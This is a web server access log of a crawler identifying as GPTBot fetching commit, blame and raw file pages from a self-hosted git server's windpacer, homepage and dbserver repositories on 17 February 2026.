"/windpacer/windpacer/find/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 7489] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:13:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13650] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:13:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:13:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 27433] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 11545] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/recent-commits" [Client 74.7.227.38] [Length 7527] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15231] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 9913] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" +[17/Feb/2026:13:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer.rss" [Client 74.7.227.38] [Length 7385] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" [Client 74.7.227.38] [Length 9838] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" [Client 74.7.227.38] [Length 10607] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" [Client 74.7.227.38] [Length 10797] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" [Client 74.7.227.38] [Length 10825] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" [Client 74.7.227.38] [Length 10798] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" +[17/Feb/2026:13:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 19134] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/yearly" [Client 74.7.227.38] [Length 8609] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases" [Client 74.7.227.38] [Length 7417] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14193] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" +[17/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" [Client 74.7.227.38] [Length 10144] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" [Client 74.7.227.38] [Length 10143] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23896] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:13:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23926] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:13:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23926] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:13:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" [Client 74.7.227.38] [Length 10547] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14297] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" +[17/Feb/2026:13:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" +[17/Feb/2026:13:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" [Client 74.7.227.38] [Length 10723] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:13:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" +[17/Feb/2026:13:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" [Client 74.7.227.38] [Length 10920] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:13:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" +[17/Feb/2026:13:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71397] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71400] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71366] [Gzip 21.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" +[17/Feb/2026:13:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" +[17/Feb/2026:13:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 13891] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15544] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" +[17/Feb/2026:13:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15511] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16434] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16466] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 10967] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" +[17/Feb/2026:13:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14159] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 14776] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 14809] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/monthly" [Client 74.7.227.38] [Length 8582] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" 